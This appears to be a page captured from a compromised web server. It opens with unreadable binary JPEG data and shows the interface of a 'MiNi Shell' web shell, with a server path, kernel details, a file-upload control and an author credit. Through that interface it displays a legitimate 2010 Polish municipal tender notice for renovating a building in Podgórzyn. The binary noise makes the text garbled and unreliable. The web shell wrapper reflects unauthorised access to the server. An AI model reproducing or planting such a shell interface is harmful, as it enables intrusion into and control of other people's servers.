JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100408/97678-N-2010.html

<p class="kh_header"><b>Podgórzyn: Remont budynku zaplecza Żołnierska 14 w Podgórzynie</b><br>
<b>Numer ogłoszenia: 97678 - 2010; data zamieszczenia: 08.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Podgórzyn , ul. Żołnierska 14, 58-562 Podgórzyn, woj. dolnośląskie, tel. 075 7621093, faks 075 7621358.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podgorzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku zaplecza Żołnierska 14 w Podgórzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac remontowych obejmuje:
- roboty  remontowe budowlane wewnętrzne
- wymiana instalacji elektrycznej
- wymiana instalacji wodno-kanalizacyjnej
- wymiana instalacji centralnego ogrzewania
- wymiana przyłącza energetycznego
- wymiana przyłącza wodnego
- wymiana przyłącza kanalizacyjnego

Opis stanu istniejącego:
Budynek rozbudowany w planie, dwukondygnacyjny z parterowymi przybudówkami realizowanymi w różnych okresach czasu, nie podpiwniczony. Budynek wykonany w technologii tradycyjnej
- fundamenty betonowe i murowane z kamienia
- ściany murowane z cegły i kamienia,  w przybudówkach z pustaków, na zaprawie wapiennej i cementowo-wapiennej.
- stropy nad parterem łukowo-odcinkowe na belkach stalowych gr. płyty ceramicznej 12 cm nad garażem strop WPS
- dachy płaskie drewniane belkowe, nad dwustanowiskowym garażem korytka dachowe na belkach stalowych, nad garażem jednostanowiskowym stropodach płaski płyty korytkowe na ściankach kolankowych
- pokrycia dachów papą na deskowaniu i papa na szlichcie cementowej.
Obiekt wyposażony w podstawowe instalacje zrealizowane w latach 60-tych XX wieku.
- wodno-kanalizacyjną - do wymiany
- elektryczną - do wymiany
- ogrzewanie centralne - do wymiany i przepięcia do istniejącej kotłowni gazowej
- przyłącze wodociągowe  średnicy 32 mm długość 16 mb do wymiany
- przyłącze kanalizacyjne  z rur żeliwnych , płytko ułożone w złym stanie technicznym do wymiany długość 9,50
- przyłącze energetyczne - prowadzone z budynku sąsiedniego - w złym stanie technicznym do wymiany.
Budynek użytkowany obecnie i po remoncie jako pomieszczenia garażowo-warsztatowo-magazynowe z zapleczem socjalnym dla pracowników.
Zakres robót obejmuje:
1. Prace zabezpieczające zgodnie z dokumentacja techniczną w zakresie
- wymiana nadproży okiennych i drzwiowych 10 szt.  dwa dwuteowniki 120
- demontaż schodów drewnianych, wykonanie schodów płytowych wylewanych 
- wykonanie przedsionka o wymiarach 2,05 x 2,63
- wykonanie stropu płytowego gr. 10 o pow .7m2  B20 opartego na dwóch belkach stalowych dwuteownik normalny 160
- dospawanie prętów stalowych fi 14 do stopek belek stalowych stropu stalowo-ceramicznego
2. Roboty remontowo-budowlane wewnętrzne:
- wymiana stolarki okiennej - 12 szt.
- wymiana krat okiennych - 12,85m2
- wymiana drzwi i ościeżnic wewnętrznych - 7 szt.
- wymiana drzwi i ościeżnic zewnętrznych  - 6 szt.
- wymiana wrót garażowych - 3 szt.
- izolacje p.wilgociowe pod posadzkami -118,92 m2
- izolacje cieplne posadzkowe  plyty styropianowe gr. 12 cm
- podłoża betonowe B 12,5 gr. 10 cm - 225,0 m2
- posadzki cementowe - 97,91 m2
- posadzki z płytek ceramicznych - 55,01 m2
- ścianki działowe z gazobetonu gr. 12 cm - 28,14 m2
- ściana gr. 37 cm z gazobetonu - 3,41 m2
- tynki kat. II ścian - 235,80 m2
- tynki pocienione - 31,35 m2
- glazura ścienna  - 90,70 m2
- gładzie wewnętrzne gipsowe ścian i stropów - 348,16 m2
- okładziny stropów z płyt gipsowo-kartonowych gr. 12 cm  na rusztach drewnianych  - 149,38 m2
- izolacja cieplna dachów z wełny mineralnej gr. 20 cm - 108,24 m2
- wymiana pokrycia dachu papą na podłożu betonowym dwuwarstwowo - 102,0m2
- wymiana pokrycia dachu papą na podłożu  drewnianym dwuwarstwowo
- obróbki dachu z blachy ocynk gr. 0,55 mm - 12,30 m2
- rynny dachowe fi 15 z blachy ocynk  - 4,80 m
- rury spustowe fi 12 z blachy ocynk.  - 2,50 m
- malowanie  ścian i stropów farbą emulsyjną dwukrotne z gruntowaniem - 534,01 m2
3. instalacje sanitarne
- rurociagi w instalacjach wodociągowych metalowe fi 20 - 51 mb
- dodatki za podejścia dopływowe - 16 szt.
- wodomierze skrzydełkowe - 1 szt.
- zawory przelotowe i zwrotne - 7 szt.
- baterie umywalkowe i zmywakowe fi 15 mm - 5 szt.
- zawory czerpalne fi 15 mm - 4 szt.
- zlewozmywaki stalowe na szafkach - 1 szt.
- umywalki pojedyncze porcelanowe - 4 szt.
- wanienka kapielowa do mycia nóg - 1 szt.
- kabina natryskowa  - 1 szt.
- pisuar pojedynczy - 1 kpl.
- ustępy porcelanowe kompakt - 1 kpl.
- podejścia odpływowe PCW fi 50 - 5 szt.
- podejścia odpływowe PCW fi 110 - 1 szt.
- czyszczaki kanalizacyjne fi 110 - 2 szt.
- rurociągi fi 110 PCW - 39 mb
- rurociagi PCW fi 50 - 17,50 mb
4. Instalacja centralnego ogrzewania zasilana z istniejącej kotłowni gazowej wykonana z rur miedzianych 
- rurociagi miedziane fi 15 mm lutowane - 43 mb
- rurociągi  miedziane fi 18 mm lutowane - 28,00 m
- rurociągi  miedziane fi 22 mm lutowane - 52,00 m
- zawory termostatyczne - 8 szt.
- zawory przelotowe - 8 szt.
- grzejniki stalowe  - 8 szt.
5. instalacja elektryczna w budynku 
- tablice bezpiecznikowe z osprzętem - 3 szt.
- przewód wtynkowy YDY5x16 mm2 - 15 m,
- przewód wtynkowy YDY5x10mm2 - 35 m,
- przewód wtynkowy YDY5x4mm2 - 60 m,
- przewód wtynkowy YDY5x2,5mm2 - 120 m,
- przewód wtynkowy YDY5x1,5mm2 - 80 m,
- puszki instalacyjne podtynkowe - 40 szt.
- łączniki jednobiegunowe pojedyncze - 14 szt.
- gniazda wtyczkowe 2-bieg. szczelne - 26 szt.
- gniazda siłowe 5-bieg. 32 A - 9 szt.
- oprawy oświetleniowe szczelne 2x58W - 6 kpl.
- oprawy oświetleniowe szczelne 2x36 - 4 kpl.
- oprawy oświetleniowe szczelne 1x36W - 10 kpl.
6. Przyłącza
6.1. wymiana przyłącza kanalizacyjnego do istniejącej sieci kanalizacyjnej fi 160  l=9,50 m z uzupełnieniem nawierzchni asfaltowej
6.2. wewnętrzna linia energetyczna zasilająca z budynku Żołnierska 14
- kabel  YKY5x16 mm2 ułożony w ziemi - 32 mb,
- rura osłonowa DVK50 - 30 mb,
- szafka licznikowa - 1 szt.
6.3. wymiana przyłącza wodnego z usytuowaniem w kanale co i wpięciem w piwnicy budynku  Żołnierska 14
6.4. przyłącze co biegnące kanałem  przy ścianie zewnętrznej budynku  Żołnierska 14 -16,0 mb
- ściany kanału z betonu  B 15 - 2,34 m3
- płyty przekrycia kanału 16 szt o wym  60x100 cm gr. 10 cm
- rurociagi fi 28 miedziane izolowane - 64 mb.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.45.30.00-7, 45.31.00.00-3, 45.31.53.00-1, 45.33.11.07-7, 45.32.00.00-6, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie najmniej jednej roboty budowlanej o zakresie i charakterze porównywalnym z niniejszym zamówieniem, tzn. roboty o wartości powyżej 150.000,00 zł, zawierającą w swym zakresie budowę, bądź remont obiektu użyteczności publicznej oraz załączenie dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie osobą (osobami) uczestniczącymi w wykonywaniu zamówienia, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej. Ocena spełnienia ww. warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://podgorzyn.signform.pl/podgorzyn/browse.php?catprz=527<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Podgórzyn 
ul. Żołnierska 14
58-562 Podgórzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 09:30, miejsce: Urząd Gminy Podgórzyn
ul. Żołnierska 14
58-562 Podgórzyn
Pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com